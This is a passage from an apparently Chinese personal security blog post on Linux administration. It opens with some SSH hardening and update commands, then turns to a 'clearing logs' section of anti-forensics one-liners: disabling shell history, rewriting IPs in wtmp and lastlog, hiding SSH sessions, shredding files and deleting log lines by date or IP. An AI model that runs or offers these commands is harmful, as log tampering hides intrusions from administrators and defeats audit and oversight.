no</div><div class="line">$ service sshd restart</div><div class="line"></div><div class="line"># 设置允许远程登录</div><div class="line">$ vi /etc/ssh/sshd_config</div><div class="line">    AllowUsers orleven</div><div class="line">$ service sshd restart</div><div class="line"></div><div class="line"># 系统怎么打内核，操作系统，所有应用程序，插件和Web服务的最新补丁？</div><div class="line">$ apt-get update &amp;&amp; apt-get upgrade</div><div class="line">$ yum update</div><div class="line"></div><div class="line"></div><div class="line"># 查看进程：</div><div class="line">    ps -e | grep ssh</div><div class="line">    ps -e   -o &apos;%C   : %p : %z : %a&apos;|sort -k5 -nr   按内存从大到小排列</div><div class="line">    ps -e   -o &apos;%C   : %p : %z : %a&apos;|sort   -nr  按cpu利用率从大到小排列</div></pre></td></tr></table></figure>
<p>这里附上一个网传的<a href="/tools/linux_safe_shell.sh">Linux安全检查脚本</a></p>
<h2 id="清除日志"><a href="#清除日志" class="headerlink" title="清除日志"></a>清除日志</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div></pre></td><td class="code"><pre><div class="line">登录后执行下面命令,不记录历史命令(.bash_history)</div><div class="line"><span class="built_in">unset</span> HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; <span class="built_in">export</span> HISTFILE=/dev/null; <span class="built_in">export</span> HISTSIZE=0; <span class="built_in">export</span> HISTFILESIZE=0</div><div class="line"></div><div class="line"></div><div class="line">last命令结果修改ip(如果修改用户什么的,自己修改下把)</div><div class="line"></div><div class="line">Centos</div><div class="line">utmpdump /var/<span class="built_in">log</span>/wtmp |sed <span class="string">"s/8.8.8.8/1.1.1.1/g"</span> |utmpdump -r &gt;/tmp/wtmp1 &amp;&amp;\mv  /tmp/wtmp1 /var/<span class="built_in">log</span>/wtmp</div><div class="line"></div><div class="line">unix</div><div class="line">/usr/lib/acct/fwtmp &lt; /var/adm/wtmpx | sed <span class="string">"s/192.168.8.88/localhost/g"</span> | /usr/lib/acct/fwtmp -ic &gt; /var/adm/wtmpx</div><div class="line"></div><div class="line"></div><div class="line">lastlog 修改替换</div><div class="line">sed -i <span class="string">'s/192.168.1.1/8.8.8.8/'</span> /var/<span class="built_in">log</span>/lastlog</div><div class="line"></div><div class="line"></div><div class="line">不记录ssh公钥在本地.ssh目录中</div><div class="line">ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i</div><div class="line"></div><div class="line">多次覆盖文件，使得即使是昂贵的硬件探测仪器也难以将数据复原 -n, --iterations=N    覆盖N 次，而非使用默认的3 次。</div><div class="line">shred -n 31337 -z -u filename</div><div class="line"></div><div class="line">-n, --iterations=N    覆盖N 次，而非使用默认的3 次</div><div class="line">-z, --zero         最后一次使用0 进行覆盖以隐藏覆盖动作</div><div class="line">-u, --remove        覆盖后截断并删除文件</div><div class="line"></div><div class="line">登录账户 w下管理员是看不到的</div><div class="line">ssh -T somebody@8.8.8.8 /bin/bash –i</div><div class="line"></div><div class="line">日志文件</div><div class="line">/var/<span class="built_in">log</span>/message 系统启动后的信息和错误日志，是Red Hat Linux中最常用的日志之一</div><div class="line">/var/<span class="built_in">log</span>/secure 与安全相关的日志信息</div><div class="line">/var/<span class="built_in">log</span>/maillog 与邮件相关的日志信息</div><div class="line">/var/<span class="built_in">log</span>/cron 与定时任务相关的日志信息</div><div class="line">/var/<span class="built_in">log</span>/spooler 与UUCP和news设备相关的日志信息</div><div class="line">/var/<span class="built_in">log</span>/boot.log 守护进程启动和停止相关的日志消息</div><div class="line">/var/<span class="built_in">log</span>/btmp – 记录所有失败登录信息  命令:lastb</div><div class="line">/var/<span class="built_in">log</span>/auth.log 系统授权信息，包括用户登录和使用的权限机制等 (debian)</div><div class="line"></div><div class="line"></div><div class="line">删除部分日志,比如以当天日期或者自己的登录ip</div><div class="line">sed  -i <span class="string">'/当前时间/'</span>d  /var/<span class="built_in">log</span>/messages</div></pre></td></tr></table></figure>
<p>个人建议登录linux,使用winscp工具连接,选择sftp协议,执行命令或者操作目录文件,在history,lastlog,last,w下不会有记录,<br>但是在<code>/var/log/secure</code>会有<code>sftp</code>连接记录,只需要清理登录日志就可以了</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/linux/" rel="tag"># linux</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/12/01/imageMagick-linux-code-execution/" rel="next" title="Linux 安装 ImageMagick 以及命令执行漏洞复现">
                <i class="fa fa-chevron-left"></i> Linux 安装 ImageMagick 以及命令执行漏洞复现
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/01/21/backdoor-base/" rel="prev" title="Backdoor 基础">
                Backdoor 基础 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>

          
          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/orleven.jpg"
               alt="Orleven" />
          <p class="site-author-name" itemprop="name">Orleven</p>
           
              <p class="site-description motion-element" itemprop="description">Life is full of ups and downs.</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">17</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">13</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">38</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/orleven" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://www.weibo.com/u/3846125587" target="_blank" title="Weibo">
                  
                    <i class="fa fa-fw fa-weibo"></i>
                  
                  Weibo
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.warmeng.com/" title="warmeng" target="_blank">warmeng</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://blog.0kami.cn/" title="0kimi" target="_blank">0kimi</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#概述"><span class="nav-number">1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#目录"><span class="nav-number">2.</span> <span class="nav-text">目录</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#基本目录"><span class="nav-number">2.1.</span> <span class="nav-text">基本目录</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#常见路径"><span class="nav-number">2.2.</span> <span class="nav-text">常见路径</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#开机流程"><span class="nav-number">3.</span> <span class="nav-text">开机流程</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#文件属性"><span class="nav-number">4.</span> <span class="nav-text">文件属性</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#权限对目录的重要性"><span class="nav-number">4.1.</span> <span class="nav-text">权限对目录的重要性</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#可读"><span class="nav-number">4.1.1.</span> <span class="nav-text">可读</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#可写"><span class="nav-number">4.1.2.</span> <span class="nav-text">可写</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#执行"><span class="nav-number">4.1.3.</span> <span class="nav-text">执行</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#文件名限制"><span class="nav-number">4.2.</span> <span class="nav-text">文件名限制</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#常用指令"><span class="nav-number">5.</span> <span class="nav-text">常用指令</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#基础指令"><span class="nav-number">5.1.</span> <span class="nav-text">基础指令</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#常用指令-1"><span class="nav-number">5.2.</span> <span class="nav-text">常用指令</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#安全检查"><span class="nav-number">5.3.</span> <span class="nav-text">安全检查</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#清除日志"><span class="nav-number">5.4.</span> <span class="nav-text">清除日志</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Orleven</span>
</div>


<div class="powered-by">
    个人专属
</div>

<div class="theme-info">
  Orleven Blog 
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    
    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  



  




	





  





  





  



  
  
  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
      search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.popup').toggle();
    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';
      $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = $( "entry", xmlResponse ).map(function() {
            return {
              title: $( "title", this ).text(),
              content: $("content",this).text(),
              url: $( "url" , this).text()
            };
          }).get();
          var $input = document.getElementById(search_id);
          var $resultContent = document.getElementById(content_id);
          $input.addEventListener('input', function(){
            var matchcounts = 0;
            var str='<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length > 1) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var content_index = [];
                var data_title = data.title.trim().toLowerCase();
                var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                var data_url = decodeURIComponent(data.url);
                var index_title = -1;
                var index_content = -1;
                var first_occur = -1;
                // only match artiles with not empty titles and contents
                if(data_title != '') {
                  keywords.forEach(function(keyword, i) {
                    index_title = data_title.indexOf(keyword);
                    index_content = data_content.indexOf(keyword);
                    if( index_title >= 0 || index_content >= 0 ){
                      isMatch = true;
                      if (i == 0) {
                        first_occur = index_content;
                      }
                    }

                  });
                }
                // show search results
                if (isMatch) {
                  matchcounts += 1;
                  str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                  var content = data.content.trim().replace(/<[^>]+>/g,"");
                  if (first_occur >= 0) {
                    // cut out 100 characters
                    var start = first_occur - 20;
                    var end = first_occur + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if(start == 0){
                      end = 50;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    var match_content = content.substring(start, end);
                    // highlight all keywords
                    keywords.forEach(function(keyword){
                      var regS = new RegExp(keyword, "gi");
                      match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                    });

                    str += "<p class=\"search-result\">" + match_content +"...</p>"
                  }
                  str += "</li>";
                }
              })};
            str += "</ul>";
            if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
            if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
            $resultContent.innerHTML = str;
          });
          proceedsearch();
        }
      });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>


  

  

  

  


  

</body>
</html>
